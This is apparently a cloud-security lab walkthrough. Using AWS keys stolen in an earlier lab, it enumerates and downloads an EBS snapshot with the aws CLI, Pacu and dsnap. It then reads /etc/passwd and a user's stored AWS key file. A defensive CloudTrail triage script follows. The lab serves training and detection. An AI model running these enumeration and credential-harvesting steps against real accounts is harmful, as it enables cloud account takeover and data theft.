Using the aws configure command, we set up the AWS keys of the AWS account previously compromised in Lab 1. As we don’t know the region name, we keep the default (us-east-1).
aws configure
Output:
We then execute the AWS caller identity command in order to retrieve the UserID, Username, and the Account ID.
aws sts get-caller-identity
Output:
From the output we can observe that we hold tomas’s access keys and that the Account ID is 999143725571.
Based on the tomasnotes file (Lab 1), it seems that tomas is waiting for his EBS Snapshot to be ready. In other words, he is waiting for an EC2 volume to be backed up.
Since we don’t know the region name, let’s execute our first attempt to discover EC2 snapshots in the “us-east-1” region. (Subsequently we can try one by one all 32 AWS regions.)
It should be noted that the --owner-id value is the Account ID that we found before; it is required in order to retrieve only the snapshots owned by our account.
aws ec2 describe-snapshots --region us-east-1 --owner-id 999143725571
Output:
We are not authorised to perform describe-snapshots in region us-east-1
A second attempt, this time in the “us-east-2” region, returns snapshot details.
aws ec2 describe-snapshots --region us-east-2 --owner-id 999143725571
Output:
Enumeration can also be done automatically using a tool such as Pacu. Open a new tab on your terminal, go to Tools/pacu and run the cli.py. Then press 0 to create a New Session, name it tomasebs and press enter.
cd Desktop/Tools/pacu
./cli.py
Output:
Then import your existing AWS keys into pacu and run ebs module enumeration:
> import_keys --all
> run ebs__enum_volumes_snapshots --account-ids 999143725571
Output:
The snapshot has been found. Another powerful tool for downloading and enumerating EBS snapshots is dsnap by Rhino Security.
dsnap --region us-east-2 list
Output:
Then download the snapshot:
dsnap --region us-east-2 get snap-05093cd5707afde19
It should be noted that the snapshot is 8 GB and will take some time to be downloaded.
Output:
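Seen from the defender's side, the region-by-region describe-snapshots calls and the dsnap download leave a recognisable pattern in CloudTrail. The following is an added example, not part of the original lab: it triages CloudTrail records per access key, assuming EC2 denials carry the errorCode Client.UnauthorizedOperation and that data-event logging for the EBS direct APIs (ListSnapshotBlocks, GetSnapshotBlock, which dsnap relies on) is enabled. The sample records, key IDs and function names are constructed for illustration.

```python
from collections import defaultdict

def ev(key, source, name, region, error=None):
    """Build a constructed CloudTrail record holding only the fields used below."""
    rec = {"userIdentity": {"accessKeyId": key}, "eventSource": source,
           "eventName": name, "awsRegion": region}
    if error:
        rec["errorCode"] = error
    return rec

# Constructed sample records (hypothetical key IDs, not taken from the lab account).
SAMPLE = [
    ev("AKIAEXAMPLEKEY000001", "ec2.amazonaws.com", "DescribeSnapshots", "us-east-1",
       "Client.UnauthorizedOperation"),
    ev("AKIAEXAMPLEKEY000001", "ec2.amazonaws.com", "DescribeSnapshots", "us-east-2"),
    ev("AKIAEXAMPLEKEY000001", "ebs.amazonaws.com", "ListSnapshotBlocks", "us-east-2"),
    ev("AKIAEXAMPLEKEY000001", "ebs.amazonaws.com", "GetSnapshotBlock", "us-east-2"),
    ev("AKIAEXAMPLEKEY000001", "ebs.amazonaws.com", "GetSnapshotBlock", "us-east-2"),
    ev("AKIAEXAMPLEKEY000002", "ec2.amazonaws.com", "DescribeSnapshots", "eu-west-1"),
]

DENIED = {"Client.UnauthorizedOperation", "AccessDenied"}
BLOCK_READS = {"ListSnapshotBlocks", "GetSnapshotBlock"}

def triage(events, min_regions=2):
    """Return {access_key: finding} for keys that swept regions or read snapshot blocks."""
    stats = defaultdict(lambda: {"regions": set(), "denied": 0, "block_reads": 0})
    for e in events:
        key = e.get("userIdentity", {}).get("accessKeyId")
        if not key:
            continue  # records without an access key (e.g. service events) are skipped
        s, src, name = stats[key], e.get("eventSource"), e.get("eventName")
        if src == "ec2.amazonaws.com" and name == "DescribeSnapshots":
            s["regions"].add(e.get("awsRegion"))
            if e.get("errorCode") in DENIED:
                s["denied"] += 1
        elif src == "ebs.amazonaws.com" and name in BLOCK_READS:
            s["block_reads"] += 1
    findings = {}
    for key, s in stats.items():
        # A sweep is several regions probed with at least one denial along the way.
        sweep = len(s["regions"]) >= min_regions and s["denied"] > 0
        if sweep or s["block_reads"]:
            findings[key] = {"regions": sorted(s["regions"]), "denied": s["denied"],
                             "block_reads": s["block_reads"], "region_sweep": sweep}
    return findings

if __name__ == "__main__":
    for key, finding in triage(SAMPLE).items():
        print(key, finding)
```

A single denied DescribeSnapshots call is common noise; the combination of a multi-region sweep and snapshot block reads from the same key is the signal worth alerting on.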
After downloading the snapshot, navigate to Desktop/Tools/dsnap/ and run the following command to open it in a Docker container. (It will take some time to mount.)
cd Desktop/Tools/dsnap
sudo IMAGE=home/cb8000/snap-05093cd5707afde19.img make docker/run
Searching through the snapshots, user account “tomas_sysadmin” caught our attention. Probing through the user’s home directory revealed a set of AWS keys we can utilise later on.
><fs> cat /etc/passwd
Output:
Enumerating the tomas_sysadmin home directory, we found a set of AWS keys.
ls /home/tomas_sysadmin
ls /home/tomas_sysadmin/mykeys
cat /home/tomas_sysadmin/mykeys/mykeys.txt
Output: